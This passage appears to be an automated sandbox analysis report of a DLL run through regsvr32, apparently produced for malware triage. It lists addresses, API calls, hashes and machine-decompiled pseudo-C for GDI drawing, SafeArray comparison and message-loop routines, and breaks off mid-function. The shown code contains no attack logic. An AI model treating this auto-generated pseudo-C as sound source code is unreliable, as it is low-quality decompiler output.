                                                                                                                0x100200c8
                                                                                                                0x100200cc
                                                                                                                0x100200cf
                                                                                                                0x100200d7
                                                                                                                0x100200db
                                                                                                                0x100200de
                                                                                                                0x100200e6
                                                                                                                0x100200ea
                                                                                                                0x100200ed
                                                                                                                0x100200f5
                                                                                                                0x100200f8
                                                                                                                0x100200fb
                                                                                                                0x10020100
                                                                                                                0x10020107
                                                                                                                0x10020114

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001FE82
                                                                                                                  • Part of subcall function 1000EF50: CreateRectRgnIndirect.GDI32(?), ref: 1000EF57
                                                                                                                • CopyRect.USER32(?,?), ref: 1001FEBB
                                                                                                                • InflateRect.USER32 ref: 1001FED1
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1001FEDF
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1001FEE9
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FEFC
                                                                                                                  • Part of subcall function 1001FC40: CombineRgn.GDI32(?,?,00000002,?), ref: 1001FC63
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FF68
                                                                                                                • CopyRect.USER32(?,?), ref: 1001FF85
                                                                                                                • InflateRect.USER32 ref: 1001FF9B
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1001FFA9
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FFDF
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10020054
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100200A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                                • String ID:
                                                                                                                • API String ID: 3342639795-0
                                                                                                                • Opcode ID: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
                                                                                                                • Instruction ID: bd3a7d774bfc99ff7712cfe706d239d58d67da9b393fb4a1fd8b60a1480de821
                                                                                                                • Opcode Fuzzy Hash: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
                                                                                                                • Instruction Fuzzy Hash: 039115B590020EAFDF01DFA4CA95DEEBBB9FF08204F104169F506A2251DB34AE05CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10023058 Relevance: 19.7, APIs: 13, Instructions: 205COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E10023058(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t106;
				signed int _t113;
				intOrPtr _t124;
				intOrPtr _t127;
				void* _t133;
				signed int _t141;
				signed int _t143;
				intOrPtr _t170;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int _t193;
				intOrPtr* _t194;
				intOrPtr* _t195;
				signed int _t197;
				intOrPtr* _t198;
				void* _t199;

				_push(0x34);
				E10047680(0x1008f746, __ebx, __edi, __esi);
				_t86 =  *((intOrPtr*)(_t199 + 8));
				if(_t86 == 0 ||  *((intOrPtr*)(_t199 + 0xc)) == 0) {
					__eflags = _t86 -  *((intOrPtr*)(_t199 + 0xc));
					_t83 = _t86 ==  *((intOrPtr*)(_t199 + 0xc));
					__eflags = _t83;
					_t87 = 0 | _t83;
				} else {
					_t191 = __imp__#17;
					_t89 =  *_t191(_t86);
					_t141 = _t89;
					 *(_t199 - 0x30) = _t141;
					_t90 =  *_t191( *((intOrPtr*)(_t199 + 0xc)));
					_t187 = _t90;
					if(_t141 == _t90) {
						__eflags = _t141;
						if(_t141 != 0) {
							_t192 = __imp__#18;
							_t91 =  *_t192( *((intOrPtr*)(_t199 + 8)));
							 *(_t199 - 0x2c) = _t91;
							__eflags =  *(_t199 - 0x2c) -  *_t192( *((intOrPtr*)(_t199 + 0xc)));
							if(__eflags != 0) {
								goto L3;
							} else {
								 *((intOrPtr*)(_t199 - 0x14)) = 0;
								 *((intOrPtr*)(_t199 - 0x18)) = 0;
								 *((intOrPtr*)(_t199 - 0x1c)) = 0;
								 *((intOrPtr*)(_t199 - 0x20)) = 0;
								 *((intOrPtr*)(_t199 - 0x24)) = 0;
								 *((intOrPtr*)(_t199 - 0x28)) = 0;
								 *(_t199 - 4) = 0;
								_t193 = 4;
								 *((intOrPtr*)(_t199 - 0x14)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
								 *((intOrPtr*)(_t199 - 0x18)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
								 *((intOrPtr*)(_t199 - 0x1c)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
								 *((intOrPtr*)(_t199 - 0x20)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
								_t143 = 1;
								_t106 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _t106 -  *(_t199 - 0x30);
									if(_t106 >=  *(_t199 - 0x30)) {
										break;
									}
									_t197 = _t106 << 2;
									_t170 =  *((intOrPtr*)(_t199 - 0x14)) + _t197;
									_t189 = _t106 + 1;
									 *((intOrPtr*)(_t199 - 0x38)) = _t170;
									__imp__#20( *((intOrPtr*)(_t199 + 8)), _t189, _t170);
									E1002303B(_t106);
									_t124 =  *((intOrPtr*)(_t199 - 0x18)) + _t197;
									 *((intOrPtr*)(_t199 - 0x3c)) = _t124;
									__imp__#20( *((intOrPtr*)(_t199 + 0xc)), _t189, _t124);
									E1002303B(_t124);
									_t127 =  *((intOrPtr*)(_t199 - 0x1c)) + _t197;
									 *((intOrPtr*)(_t199 - 0x34)) = _t127;
									__imp__#19( *((intOrPtr*)(_t199 + 8)), _t189, _t127);
									E1002303B(_t127);
									_t198 = _t197 +  *((intOrPtr*)(_t199 - 0x20));
									__imp__#19( *((intOrPtr*)(_t199 + 0xc)), _t189, _t198);
									E1002303B( *((intOrPtr*)(_t199 - 0x20)));
									_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x34)))) -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x38))));
									__eflags = _t133 -  *_t198 -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x3c))));
									if(__eflags == 0) {
										_t143 = _t143 * (_t133 + 1);
										_t106 = _t189;
										continue;
									} else {
										_push( *((intOrPtr*)(_t199 - 0x14)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x18)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x1c)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										_push( *((intOrPtr*)(_t199 - 0x20)));
										E10009F3F(_t143, _t189, _t198, __eflags);
										goto L3;
									}
									goto L14;
								}
								_t194 = __imp__#23;
								E1002303B( *_t194( *((intOrPtr*)(_t199 + 8)), _t199 - 0x24));
								E1002303B( *_t194( *((intOrPtr*)(_t199 + 0xc)), _t199 - 0x28));
								_t144 = _t143 *  *(_t199 - 0x2c);
								_t113 = E1004A7B7( *((intOrPtr*)(_t199 - 0x24)),  *((intOrPtr*)(_t199 - 0x28)), _t143 *  *(_t199 - 0x2c));
								_t195 = __imp__#24;
								__eflags = _t113;
								_t188 = 0 | _t113 == 0x00000000;
								E1002303B( *_t195( *((intOrPtr*)(_t199 + 8))));
								E1002303B( *_t195( *((intOrPtr*)(_t199 + 0xc))));
								_push( *((intOrPtr*)(_t199 - 0x14)));
								 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x18)));
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x1c)));
								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
								_push( *((intOrPtr*)(_t199 - 0x20)));
								E10009F3F(_t144, _t188, _t195, __eflags);
								_t87 = _t188;
							}
						} else {
							_t87 = 1;
						}
					} else {
						L3:
						_t87 = 0;
					}
				}
				L14:
				return E10047725(_t87);
			}


























                                                                                                                0x10023058
                                                                                                                0x1002305f
                                                                                                                0x10023064
                                                                                                                0x10023069
                                                                                                                0x100232d6
                                                                                                                0x100232d9
                                                                                                                0x100232d9
                                                                                                                0x100232dc
                                                                                                                0x10023079
                                                                                                                0x10023079
                                                                                                                0x10023080
                                                                                                                0x10023085
                                                                                                                0x10023087
                                                                                                                0x1002308a
                                                                                                                0x1002308c
                                                                                                                0x10023090
                                                                                                                0x10023099
                                                                                                                0x1002309b
                                                                                                                0x100230a8
                                                                                                                0x100230ae
                                                                                                                0x100230b3
                                                                                                                0x100230b8
                                                                                                                0x100230bb
                                                                                                                0x00000000
                                                                                                                0x100230bd
                                                                                                                0x100230c1
                                                                                                                0x100230c4
                                                                                                                0x100230c7
                                                                                                                0x100230ca
                                                                                                                0x100230cd
                                                                                                                0x100230d0
                                                                                                                0x100230d3
                                                                                                                0x100230d8
                                                                                                                0x100230ec
                                                                                                                0x10023105
                                                                                                                0x1002311e
                                                                                                                0x10023137
                                                                                                                0x1002313a
                                                                                                                0x1002313c
                                                                                                                0x1002313c
                                                                                                                0x1002313e
                                                                                                                0x1002313e
                                                                                                                0x10023141
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002314c
                                                                                                                0x1002314f
                                                                                                                0x10023152
                                                                                                                0x10023159
                                                                                                                0x1002315c
                                                                                                                0x10023163
                                                                                                                0x1002316b
                                                                                                                0x10023172
                                                                                                                0x10023175
                                                                                                                0x1002317c
                                                                                                                0x10023184
                                                                                                                0x1002318b
                                                                                                                0x1002318e
                                                                                                                0x10023195
                                                                                                                0x1002319d
                                                                                                                0x100231a4
                                                                                                                0x100231ab
                                                                                                                0x100231b8
                                                                                                                0x100231c1
                                                                                                                0x100231c3
                                                                                                                0x100231ef
                                                                                                                0x100231f2
                                                                                                                0x00000000
                                                                                                                0x100231c5
                                                                                                                0x100231c5
                                                                                                                0x100231c8
                                                                                                                0x100231ce
                                                                                                                0x100231d1
                                                                                                                0x100231d7
                                                                                                                0x100231da
                                                                                                                0x100231e0
                                                                                                                0x100231e3
                                                                                                                0x00000000
                                                                                                                0x100231e8
                                                                                                                0x00000000
                                                                                                                0x100231c3
                                                                                                                0x100231f9
                                                                                                                0x10023209
                                                                                                                0x10023218
                                                                                                                0x1002321d
                                                                                                                0x10023228
                                                                                                                0x1002322d
                                                                                                                0x1002323b
                                                                                                                0x10023240
                                                                                                                0x10023245
                                                                                                                0x10023250
                                                                                                                0x10023255
                                                                                                                0x10023258
                                                                                                                0x1002325c
                                                                                                                0x10023261
                                                                                                                0x10023264
                                                                                                                0x10023269
                                                                                                                0x1002326c
                                                                                                                0x10023271
                                                                                                                0x10023274
                                                                                                                0x1002327c
                                                                                                                0x1002327c
                                                                                                                0x1002309d
                                                                                                                0x1002309f
                                                                                                                0x1002309f
                                                                                                                0x10023092
                                                                                                                0x10023092
                                                                                                                0x10023092
                                                                                                                0x10023092
                                                                                                                0x10023090
                                                                                                                0x100232de
                                                                                                                0x100232e3

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002305F
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10023080
                                                                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 1002308A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271779948-0
                                                                                                                • Opcode ID: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
                                                                                                                • Instruction ID: 44957efc3b56635bff52d89a81c6fb787a21c65e9e7561bfa9423d8dcc95ac9e
                                                                                                                • Opcode Fuzzy Hash: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
                                                                                                                • Instruction Fuzzy Hash: 06615176E00159AFEF04DFB4DC858AEBFB5EF08390B50846AF405E72A0DB359910CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000D64C Relevance: 18.2, APIs: 12, Instructions: 206windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1000D64C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t121;
				intOrPtr _t127;
				intOrPtr _t128;
				void* _t175;
				void* _t176;

				_t176 = __eflags;
				_t166 = __edi;
				_push(0x58);
				E1004764D(0x1008e0cd, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t175 - 0x3c)) = 0x1009a2fc;
				 *(_t175 - 0x38) = 0;
				 *((intOrPtr*)(_t175 - 0x34)) = 0;
				 *((intOrPtr*)(_t175 - 0x30)) = 0;
				 *(_t175 - 4) = 0;
				 *((intOrPtr*)(_t175 - 0x4c)) = 0x1009a2fc;
				 *(_t175 - 0x48) = 0;
				 *((intOrPtr*)(_t175 - 0x44)) = 0;
				 *((intOrPtr*)(_t175 - 0x40)) = 0;
				 *((intOrPtr*)(_t175 - 0x18)) = 0;
				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098d24;
				 *(_t175 - 4) = 2;
				_push(GetSysColor(0x14));
				E1000D544(0, _t175 - 0x2c, __edi, GetSysColor, _t176);
				 *(_t175 - 4) = 3;
				_push(GetSysColor(0x10));
				E1000D544(0, _t175 - 0x24, __edi, GetSysColor, _t176);
				 *(_t175 - 4) = 4;
				if(E1000CCDC(_t175 - 0x3c, _t166, _t175, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t175 - 0x4c, _t166, _t175, CreateCompatibleDC(0)) != 0) {
					_t173 =  *((intOrPtr*)(_t175 + 8));
					GetObjectA( *( *((intOrPtr*)(_t175 + 8)) + 4), 0x18, _t175 - 0x64);
					L1000CFF6( *((intOrPtr*)(_t175 + 0xc)));
					if(L1000111D( *((intOrPtr*)(_t175 + 0xc)),  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x54) & 0x0000ffff,  *(_t175 - 0x52) & 0x0000ffff, 0) != 0 && L1000CFA3(_t175 - 0x1c, _t166, _t175, CreateBitmap( *(_t175 - 0x60),  *(_t175 - 0x5c), 1, 1, 0)) != 0) {
						 *((intOrPtr*)(_t175 + 8)) = E1000D0A1( *(_t175 - 0x38),  *((intOrPtr*)(_t173 + 4)));
						_t121 = E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)(_t175 - 0x18)));
						 *((intOrPtr*)(_t175 - 0x14)) = _t121;
						if( *((intOrPtr*)(_t175 + 8)) != 0 && _t121 != 0) {
							 *((intOrPtr*)(_t175 - 0x10)) = E1000BD03(GetPixel( *(_t175 - 0x38), 0, 0), _t175 - 0x3c, _t122);
							E1000BD03(BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0xcc0020), _t175 - 0x3c, 0xffffff);
							BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0x1100a6);
							_t127 =  *((intOrPtr*)(_t175 + 0xc));
							if(_t127 != 0) {
								_t128 =  *((intOrPtr*)(_t127 + 4));
							} else {
								_t128 = 0;
							}
							if(E1000D0A1( *(_t175 - 0x38), _t128) != 0) {
								E1000BD03(E10020117(_t175 - 0x3c, 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *((intOrPtr*)(_t175 + 0x10))), _t175 - 0x3c, 0xffffff);
								 *((intOrPtr*)(_t175 + 0xc)) = E1000D13A(_t175 - 0x3c, _t175 - 0x2c);
								BitBlt( *(_t175 - 0x38), 1, 1,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
								E1000D13A(_t175 - 0x3c, _t175 - 0x24);
								BitBlt( *(_t175 - 0x38), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
								E1000BD03(E1000D13A(_t175 - 0x3c,  *((intOrPtr*)(_t175 + 0xc))), _t175 - 0x3c,  *((intOrPtr*)(_t175 - 0x10)));
							}
							E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)( *((intOrPtr*)(_t175 - 0x14)) + 4)));
							E1000D0A1( *(_t175 - 0x38),  *( *((intOrPtr*)(_t175 + 8)) + 4));
						}
					}
				}
				 *(_t175 - 4) = 3;
				 *((intOrPtr*)(_t175 - 0x24)) = 0x10098308;
				L1000CFF6(_t175 - 0x24);
				 *(_t175 - 4) = 2;
				 *((intOrPtr*)(_t175 - 0x2c)) = 0x10098308;
				L1000CFF6(_t175 - 0x2c);
				 *(_t175 - 4) = 1;
				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098308;
				L1000CFF6(_t175 - 0x1c);
				 *(_t175 - 4) = 0;
				L1000CD56(_t175 - 0x4c);
				 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t175 - 0x3c));
			}








                                                                                                                0x1000d64c
                                                                                                                0x1000d64c
                                                                                                                0x1000d64c
                                                                                                                0x1000d653
                                                                                                                0x1000d65f
                                                                                                                0x1000d662
                                                                                                                0x1000d665
                                                                                                                0x1000d668
                                                                                                                0x1000d66b
                                                                                                                0x1000d66e
                                                                                                                0x1000d671
                                                                                                                0x1000d674
                                                                                                                0x1000d677
                                                                                                                0x1000d67a
                                                                                                                0x1000d67d
                                                                                                                0x1000d68c
                                                                                                                0x1000d692
                                                                                                                0x1000d696
                                                                                                                0x1000d69d
                                                                                                                0x1000d6a3
                                                                                                                0x1000d6a7
                                                                                                                0x1000d6b3
                                                                                                                0x1000d6c4
                                                                                                                0x1000d6de
                                                                                                                0x1000d6ea
                                                                                                                0x1000d6f3
                                                                                                                0x1000d713
                                                                                                                0x1000d749
                                                                                                                0x1000d74f
                                                                                                                0x1000d757
                                                                                                                0x1000d75a
                                                                                                                0x1000d78c
                                                                                                                0x1000d7a5
                                                                                                                0x1000d7bf
                                                                                                                0x1000d7c1
                                                                                                                0x1000d7c6
                                                                                                                0x1000d7cc
                                                                                                                0x1000d7c8
                                                                                                                0x1000d7c8
                                                                                                                0x1000d7c8
                                                                                                                0x1000d7da
                                                                                                                0x1000d7f3
                                                                                                                0x1000d80f
                                                                                                                0x1000d81f
                                                                                                                0x1000d828
                                                                                                                0x1000d83e
                                                                                                                0x1000d851
                                                                                                                0x1000d851
                                                                                                                0x1000d85f
                                                                                                                0x1000d86d
                                                                                                                0x1000d86d
                                                                                                                0x1000d75a
                                                                                                                0x1000d713
                                                                                                                0x1000d87a
                                                                                                                0x1000d87e
                                                                                                                0x1000d881
                                                                                                                0x1000d889
                                                                                                                0x1000d88d
                                                                                                                0x1000d890
                                                                                                                0x1000d898
                                                                                                                0x1000d89c
                                                                                                                0x1000d89f
                                                                                                                0x1000d8a7
                                                                                                                0x1000d8aa
                                                                                                                0x1000d8af
                                                                                                                0x1000d8c0

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000D653
                                                                                                                • GetSysColor.USER32 ref: 1000D690
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • GetSysColor.USER32 ref: 1000D6A1
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000D6B7
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000D6CB
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000D6EA
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D724
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000D76D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D79A
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000D7BF
                                                                                                                • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 1000D81F
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 1000D83E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorCreate$CompatibleH_prolog3Object$BitmapBrushPixelSelectSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 308505048-0
                                                                                                                • Opcode ID: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
                                                                                                                • Instruction ID: a11892d7ca785269b60d086ed1427836696bf80ae4361ed389aeb394a5747b4d
                                                                                                                • Opcode Fuzzy Hash: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
                                                                                                                • Instruction Fuzzy Hash: 2C81C575C0020DAEEF01EFE4DC81AEEBBB9EF08384F10802AF515A6165DB719E55DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100272E2 Relevance: 18.2, APIs: 12, Instructions: 150windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E100272E2(intOrPtr* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				struct tagMSG _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t46;
				int _t49;
				long _t50;
				int _t56;
				int _t58;
				int _t64;
				int _t73;
				int _t83;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t92;
				void* _t93;

				_t92 = __ecx;
				_t88 = 1;
				if( *((intOrPtr*)(__ecx + 0x68)) == 1) {
					L26:
					return _t46;
				}
				_t46 = L10026F7E();
				if(_t46 == 0) {
					goto L26;
				}
				_t46 = PeekMessageA( &_v56,  *(__ecx + 0x20), 0x367, 0x367, 3);
				if(_t46 != 0) {
					goto L26;
				}
				_t49 =  *(_t92 + 0x68);
				_v16 = _t49;
				 *(_t92 + 0x68) = 1;
				if(_t49 == 2) {
					L7:
					__eflags = _v16;
					_push(0);
					if(_v16 != 0) {
						_t50 = SendMessageA( *(_t92 + 0x20), 0x362, 0xe002, ??);
						__eflags = _t50;
						_v16 = _t50;
						if(_t50 == 0) {
							_v16 = 0xe001;
						}
						_v12 = 0;
						GetCursorPos( &_v28);
						L10026FD8(_t92, _v28.x, _v28.y, 0);
						_v8 = 0;
						_t89 =  *((intOrPtr*)(E1001E302(0, _t88, _t92, __eflags) + 4));
						_v20 = _t89;
						while(1) {
							__eflags =  *(_t92 + 0x68);
							if( *(_t92 + 0x68) == 0) {
								break;
							}
							_t56 = PeekMessageA( &_v56, 0, 0, 0, 0);
							__eflags = _t56;
							if(_t56 == 0) {
								_t82 = _t89;
								_t58 =  *((intOrPtr*)( *_t89 + 0x60))(_v8);
								_v8 = _v8 + 1;
								__eflags = _t58;
								if(_t58 == 0) {
									_v8 = 0;
									WaitMessage();
								}
								continue;
							}
							_t82 = _t92;
							_t73 = E100270E7(_t92,  &_v56,  &_v12);
							__eflags = _t73;
							if(_t73 == 0) {
								break;
							}
						}
						 *(_t92 + 0x68) = 0;
						ReleaseCapture();
						E10013FEA(0, _t82, _t93, SetCapture( *(_t92 + 0x20)));
						ReleaseCapture();
						SendMessageA( *(_t92 + 0x20), 0x362, _v16, 0);
						_t83 =  *(_t92 + 0x80);
						__eflags = _t83;
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 0x60))(0);
						}
						__eflags = _v12;
						if(_v12 != 0) {
							__eflags = _v12 - 0xffffffff;
							if(_v12 != 0xffffffff) {
								 *((intOrPtr*)( *_v20 + 0xac))(_v12, 1);
							} else {
								SendMessageA( *(_t92 + 0x20), 0x111, 0xe147, 0);
							}
						}
						_t64 = PostMessageA( *(_t92 + 0x20), 0x36a, 0, 0);
						L25:
						return _t64;
					}
					_t64 = PostMessageA( *(_t92 + 0x20), 0x111, 0xe145, ??);
					 *(_t92 + 0x68) = 2;
					goto L25;
				}
				_t88 = _t92 + 0x80;
				_t85 =  *_t88;
				if(_t85 == 0) {
					goto L7;
				}
				_push(1);
				if( *((intOrPtr*)( *_t85 + 0x60))() != 0) {
